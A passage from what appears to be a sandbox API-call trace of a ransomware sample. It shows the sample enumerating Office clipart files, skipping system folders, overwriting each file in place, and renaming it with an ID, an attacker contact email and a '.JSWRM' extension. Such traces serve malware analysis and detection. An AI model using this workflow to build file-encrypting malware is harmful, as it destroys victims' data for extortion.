lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.971] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=62367) returned 1 [0079.971] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf390) returned 0x24d210 [0079.972] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xf390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xf390, lpOverlapped=0x0) returned 1 [0079.985] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.985] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xf390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xf390, lpOverlapped=0x0) returned 1 [0079.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.986] CloseHandle (hObject=0x314) returned 1 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0079.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0079.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0079.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.986] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.987] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe56c811, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x462c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099192.GIF", cAlternateFileName="")) returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2=".") returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="..") returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="...") returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="windows") returned -1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="recovery") returned -1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="perflogs") returned -1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="documents and settings") returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="$RECYCLE.BIN") returned 1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="system volume information") returned -1 [0079.987] lstrcmpiW (lpString1="J0099192.GIF", lpString2="msocache") returned -1 [0079.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099192.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099192.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099192.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0079.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099192.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099192.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099192.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0079.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.988] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17964) returned 1 [0079.988] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4620) returned 0x24d210 [0079.989] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4620, lpOverlapped=0x0) returned 1 [0079.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.992] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4620, lpOverlapped=0x0) returned 1 [0079.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.992] CloseHandle (hObject=0x314) returned 1 [0079.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0079.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0079.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0079.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.993] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8ada, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099193.GIF", cAlternateFileName="")) returned 1 [0079.993] lstrcmpiW (lpString1="J0099193.GIF", lpString2=".") returned 1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="..") returned 1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="...") returned 1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="windows") returned -1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="recovery") returned -1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="perflogs") returned -1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="documents and settings") returned 1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="$RECYCLE.BIN") returned 1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="system volume information") returned -1 [0079.994] lstrcmpiW (lpString1="J0099193.GIF", lpString2="msocache") returned -1 [0079.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099193.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099193.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099193.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099193.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099193.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099193.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.994] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35546) returned 1 [0079.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8ad0) returned 0x24d210 [0079.995] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8ad0, lpOverlapped=0x0) returned 1 [0079.998] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.998] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8ad0, lpOverlapped=0x0) returned 1 [0079.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.999] CloseHandle (hObject=0x314) returned 1 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0079.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.999] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0080.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.000] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe18c9a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62b1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099194.GIF", cAlternateFileName="")) returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2=".") returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="..") returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="...") returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="windows") returned -1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="recovery") returned -1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="perflogs") returned -1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="documents and settings") returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="system volume information") returned -1 [0080.000] lstrcmpiW (lpString1="J0099194.GIF", lpString2="msocache") returned -1 [0080.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099194.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099194.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099194.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099194.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099194.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099194.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0080.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.001] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25265) returned 1 [0080.001] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x62b0) returned 0x24d210 [0080.002] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x62b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x62b0, lpOverlapped=0x0) returned 1 [0080.005] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.005] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x62b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x62b0, lpOverlapped=0x0) returned 1 [0080.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.006] CloseHandle (hObject=0x314) returned 1 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.006] MultiByteToWideChar (in: 